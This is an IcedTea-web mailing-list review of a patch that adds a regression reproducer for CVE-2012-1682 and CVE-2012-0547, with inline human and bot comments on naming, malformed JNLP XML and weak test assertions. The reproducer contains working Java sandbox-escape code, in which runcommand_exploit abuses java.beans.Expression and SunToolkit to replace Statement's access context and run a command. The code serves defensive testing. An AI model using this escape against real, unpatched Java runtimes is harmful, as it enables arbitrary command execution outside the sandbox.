[rfc][icedtea-web] Reproducer of BeansStatement behaviour
Adam Domurad
adomurad at redhat.com
Mon Dec 17 09:10:19 PST 2012
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandbox.html
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandbox.html
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,42 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<html><head></head><body bgcolor="blue">
> +<p><applet code="BeansStatementBreakSandbox1.class"
> archive="BeansStatementBreakSandbox.jar" codebase="." width="100"
> height="20">
> +</applet></p>
> +</body>
> +</html>
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandboxApplet.jnlp
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandboxApplet.jnlp
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,61 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<?xml version="1.0" encoding="utf-8"?>
> +<jnlp spec="1.0" href="BeansStatementBreakSandboxApplet.jnlp"
> codebase=".">
> + <information>
> + <title>BeansStatementBreakSandboxApplet</title>
> + <vendor>IcedTea</vendor>
> + <homepage
> href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
> + <description>BeansStatementBreakSandboxApplet</description>
> + <offline/>
> + </information>
> + <resources>
> + <j2se version="1.6+"/>
> + <jar href="BeansStatementBreakSandbox.jar"/>
> + </resources>
> + <applet-desc
> + documentBase="."
> + name="BeansStatementBreakSandboxApplet"
> + main-class="BeansStatementBreakSandbox1"
> + width="100"
> + height="100">
> + </applet-desc>
> +</jnlp>
> +
> +
> +</applet-desc>
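Review bot: The file ends with a stray `</applet-desc>` after the root `</jnlp>` has already been closed (the `<applet-desc>` element was closed inside `<jnlp>` a few lines earlier), so the document is not well-formed XML. Delete the two trailing blank lines and that tag so the file ends at `</jnlp>`. A strict XML parser would also object to the `<?xml ... ?>` declaration following the license comment rather than being the first bytes of the file; whether IcedTea-Web's JNLP parser tolerates that cannot be told from this patch, so it is worth checking against an existing reproducer that is known to launch.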
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandboxWS.jnlp
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandboxWS.jnlp
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,56 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<?xml version="1.0" encoding="utf-8"?>
> +<jnlp spec="1.0" href="BeansStatementBreakSandboxWS.jnlp" codebase=".">
> + <information>
> + <title>BeansStatementBreakSandboxWS</title>
> + <vendor>IcedTea</vendor>
> + <homepage
> href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
> + <description>BeansStatementBreakSandboxWS</description>
> + <offline/>
> + </information>
> + <resources>
> + <j2se version="1.6+"/>
> + <jar href="BeansStatementBreakSandbox.jar"/>
> + </resources>
> + <application-desc main-class="BeansStatementBreakSandbox2">
> + </application-desc>
> +</jnlp>
> +
> +
> +</applet-desc>
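Review bot: This JNLP contains no `<applet-desc>` at all, yet it ends with `</applet-desc>` after the root `</jnlp>`, leaving the document malformed XML. Remove the two trailing blank lines and the tag so the file ends at `</jnlp>`, as the `<application-desc>` it actually uses is already closed. As with the applet JNLP, the `<?xml ... ?>` declaration placed after the license comment may be rejected by a strict parser; if the IcedTea-Web parser accepts it in other reproducers this is fine, but the stray closing tag should go regardless.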
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/srcs/BeansStatementBreakSandbox1.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/srcs/BeansStatementBreakSandbox1.java
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,49 @@
> +/* BeansStatementBreakSandbox1.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import java.applet.Applet;
> +
> +
> +public class BeansStatementBreakSandbox1 extends Applet {
Argh, you love numbers :-) It's OK in this case since it's easy to see
what this does at a glance, but I prefer adding an extra word to the
name when you need to make a distinction, e.g. 'Runner' or 'Delegate' here.
> +
> + @Override
> + public void init() {
> + BeansStatementBreakSandbox2.main(new String[0]);
> +
> + }
> +
> +}
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/srcs/BeansStatementBreakSandbox2.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/srcs/BeansStatementBreakSandbox2.java
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,182 @@
> +/* BeansStatementBreakSandbox2.java
> + Copyright (C) 2011 Red Hat, Inc.
> +
> + This file is part of IcedTea.
> +
> + IcedTea is free software; you can redistribute it and/or
> + modify it under the terms of the GNU General Public License as
> published by
> + the Free Software Foundation, version 2.
> +
> + IcedTea is distributed in the hope that it will be useful,
> + but WITHOUT ANY WARRANTY; without even the implied warranty of
> + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> + General Public License for more details.
> +
> + You should have received a copy of the GNU General Public License
> + along with IcedTea; see the file COPYING. If not, write to
> + the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> + 02110-1301 USA.
> +
> + Linking this library statically or dynamically with other modules is
> + making a combined work based on this library. Thus, the terms and
> + conditions of the GNU General Public License cover the whole
> + combination.
> +
> + As a special exception, the copyright holders of this library give you
> + permission to link this library with independent modules to produce an
> + executable, regardless of the license terms of these independent
> + modules, and to copy and distribute the resulting executable under
> + terms of your choice, provided that you also meet, for each linked
> + independent module, the terms and conditions of the license of that
> + module. An independent module is a module which is not derived from
> + or based on this library. If you modify this library, you may extend
> + this exception to your version of the library, but you are not
> + obligated to do so. If you do not wish to do so, delete this
> + exception statement from your version.
> + */
> +
> +import java.beans.Statement;
> +import java.beans.Expression;
> +
> +import java.lang.reflect.Field;
> +import java.net.URL;
> +import java.security.*;
> +import java.security.cert.Certificate;
> +import java.io.InputStreamReader;
> +import java.io.BufferedReader;
> +
> +/**
> + *
> + * Summary for
Was there supposed to be something more here ? Or is it something like
'See:' ?
> + *
> + * @
> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682 and
> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547
> + */
> +public class BeansStatementBreakSandbox2 {
> +
> + public static int runproc(Process proc) throws Exception {
> + BufferedReader cmdout = new BufferedReader(new
> InputStreamReader(proc.getInputStream()));
> + String line;
> + while ((line = cmdout.readLine()) != null) {
> + System.out.println(line);
> + }
> + proc.waitFor();
> + return proc.exitValue();
> + }
> +
> + public static void runcommand_exploit(String cmd) throws Exception {
> + Expression exec_ex = new Expression(Runtime.getRuntime(),
> "exec", new String[]{cmd});
> +
> + Permissions perms = new Permissions();
> + perms.add(new AllPermission());
> + ProtectionDomain protdomain = new ProtectionDomain(
> + new CodeSource(new URL("file:///"), new
> Certificate[0]), perms);
> + AccessControlContext acc = new AccessControlContext(new
> ProtectionDomain[]{protdomain});
> +
> + Expression tmp_ex = new Expression(Class.class, "forName",
> new Object[]{"sun.awt.SunToolkit"});
> + tmp_ex.execute();
> + Class toolkit = (Class) tmp_ex.getValue();
> +
> + tmp_ex = new Expression(toolkit, "getField", new
> Object[]{Statement.class, "acc"});
> + tmp_ex.execute();
> + ((Field) tmp_ex.getValue()).set(exec_ex, acc);
> + exec_ex.execute();
> +
> + runproc((Process) exec_ex.getValue());
> + }
> +
> + public static void runcommand_direct(String cmd) throws Exception {
> + runproc(Runtime.getRuntime().exec(cmd));
> + }
> +
> + public static void main(String[] args) {
> + try {
> + System.out.println("Running GondvvTest");
> + args = new String[]{"/bin/date"};
> + try {
> + System.out.println("Directly calling:
> Class.forName(\"sun.awt.SunToolkit\")");
> +
> + Object cl = Class.forName("sun.awt.SunToolkit");
> + System.out.println("FAIL: " + cl.toString());
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> +
> +
> + try {
> + System.out.println("Calling: Expression(Class.class,
> \"forName\", new String[]{\"sun.awt.SunToolkit\"})");
> +
> + Expression ex = new Expression(Class.class,
> "forName", new String[]{"sun.awt.SunToolkit"});
> + ex.execute();
> + Object cl = ex.getValue();
> + System.out.println("FAIL: " + cl.toString());
> + System.out.println();
> + System.out.println("Checking if SunToolkit class
> reference is usable");
> + try {
> + ex = new Expression(cl, "getField", new
> Object[]{Byte.class, "SIZE"});
> + ex.execute();
> + System.out.println("FAIL: " +
> ex.getValue().toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("INFO: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: "
> + e.toString());
> + e.printStackTrace();
> + }
> +
> + try {
> + ex = new Expression(cl, "getField", new
> Object[]{Statement.class, "acc"});
> + ex.execute();
> + System.out.println("FAIL: " +
> ex.getValue().toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("INFO: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: "
> + e.toString());
> + e.printStackTrace();
> + }
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> +
> + try {
> + System.out.println("Running command directly: " +
> args[0]);
> + runcommand_direct(args[0]);
> + System.out.println("FAIL: commnad was run");
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> +
> + try {
> + System.out.println("Running command using exploit: "
> + args[0]);
> + runcommand_exploit(args[0]);
> + System.out.println("FAIL: commnad was run");
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("FAIL: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> + } finally {
> + System.out.println("*** APPLET FINISHED ***");
> + }
> +
> + }
> +}
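Review bot: Every probe in `main` accepts only `AccessControlException` as the "sandbox held" outcome, so a security manager that refuses with a plain `SecurityException` (its supertype) falls into the `catch (Exception e)` branches and prints `FAIL: unexpected exception`, which the test file's `evaluate` then reports as a successful sandbox escape. Catching `SecurityException` in those four handlers (`} catch (SecurityException e) {`) ties pass/fail to whether the sandbox actually held rather than to which exception subclass a given JDK or IcedTea-Web security manager happens to throw; it may well be `AccessControlException` today, but the reproducer should not depend on that. Separately, `runproc` never closes `cmdout` or the process streams and only drains stdout, so a child that writes a lot to stderr could block `waitFor()`, and the two `FAIL: commnad was run` messages have a typo that will end up in test logs.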
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/testcases/BeansStatementBreakSandboxTests.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/testcases/BeansStatementBreakSandboxTests.java
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,83 @@
> +/* BeansStatementBreakSandboxTests.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import net.sourceforge.jnlp.ProcessResult;
> +import net.sourceforge.jnlp.annotations.Bug;
> +import net.sourceforge.jnlp.browsertesting.BrowserTest;
> +import net.sourceforge.jnlp.browsertesting.Browsers;
> +import net.sourceforge.jnlp.annotations.NeedsDisplay;
> +import net.sourceforge.jnlp.annotations.TestInBrowsers;
> +import net.sourceforge.jnlp.closinglisteners.AutoOkClosingListener;
> +import org.junit.Assert;
> +
> +import org.junit.Test;
> +
> +public class BeansStatementBreakSandboxTests extends BrowserTest {
> +
> + @Test
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementBreakSandboxTestWS() throws Exception {
> + ProcessResult pr = server.executeJavawsHeadless(null,
> "/BeansStatementBreakSandboxWS.jnlp", new
> AutoOkClosingListener(),null, null);
>
Why does javaws need a closing listener here?
> + evaluate(pr);
> + }
> +
> + @Test
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementBreakSandboxTesWsApplet() throws
> Exception {
> + ProcessResult pr = server.executeJavawsHeadless(null,
> "/BeansStatementBreakSandboxApplet.jnlp", new
> AutoOkClosingListener(),null, null);
> + evaluate(pr);
> + }
> +
> + @Test
> + @TestInBrowsers(testIn = {Browsers.all})
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementBreakSandboxTestApplet() throws Exception {
> + ProcessResult pr =
> server.executeBrowser("/BeansStatementBreakSandbox.html", new
> AutoOkClosingListener(),null);
> + evaluate(pr);
> + Assert.assertTrue(pr.wasTerminated);
> + }
> +
> + private void evaluate(ProcessResult pr) {
> + Assert.assertTrue("Output of reproducerwas empty => it was
> not run", (pr.stdout.length() > 0));
> + Assert.assertTrue("Output of reproducerwas have not
> contained 'Running GondvvTest' => it was not run",
> (pr.stdout.contains("Running GondvvTest")));
> + Assert.assertFalse("Output of reproducer contained FAIL, that
> means that exploit have hacked your system",
> (pr.stdout.contains("FAIL:")));
> +
> + }
> +}
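Review bot: `evaluate` passes whenever stdout contains `Running GondvvTest` and no `FAIL:`, so a run that aborts after the banner but before `runcommand_exploit` is reached (JVM crash, applet killed early, unhandled error before the last probe) is reported as "sandbox held" even though the exploit was never attempted. The reproducer prints `*** APPLET FINISHED ***` in its `finally`, so assert that marker too, e.g. `Assert.assertTrue("reproducer did not run to completion", pr.stdout.contains("*** APPLET FINISHED ***"));`, or stronger, assert that the expected number of `OK: got expected` lines appears. The assertion messages `Output of reproducerwas empty` / `reproducerwas have not contained` need a space and a grammar pass, and the method name `BeansStatementBreakSandboxTesWsApplet` is missing a `t`.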
Looks OK from my end, but do answer to Omair :-)
-Adam